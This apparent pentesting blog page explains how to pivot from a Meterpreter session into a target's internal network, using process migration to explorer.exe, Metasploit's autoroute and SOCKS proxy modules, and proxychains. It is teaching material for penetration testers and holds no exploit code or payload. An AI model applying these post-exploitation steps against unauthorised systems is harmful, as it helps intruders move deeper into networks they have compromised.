H3dg3h0g's Blog
    H3dg3h0g's Blog

    Search

    Pentesting Guide and Notes

    Certification Reviews

    Writeups

    Pivoting From a Meterpreter Shell

    💡
    Before all of this, if you are on a Windows machine, it might be a good idea to first migrate to another process like explorer.exe to be sure that the meterpreter session runs with the admin’s privileges. Otherwise, you might still be using a process running with the privileges of a lower privileged user. To do so, from your meterpreter session, run:
    migrate -N explorer.exe

    Then, run:

    background
    use post/multi/manage/autoroute
    💡
    For more information about the configuration of this module, see the official documentation: https://docs.metasploit.com/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#autoroute

    Once you have correctly configured the module, run:

    run

    We can verify that the route was correctly configured using:

    route

    At this point, Metasploit modules should be able to use the pivot. To use the pivot with different tools:

    use auxiliary/server/socks_proxy
    💡
    For more information about the configuration of this module, see the official documentation: https://docs.metasploit.com/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#socks-server-module-setup

    From another terminal, we can configure proxychains-ng to pass through our proxy by adding:

    socks5 127.0.0.1 1080

    at the end of the file, using:

    sudo nano /etc/proxychains.conf

    We can now run any command through our pivot by using the command:

    sudo proxychains4 $CMD

    Note that UDP traffic cannot pass through the proxy.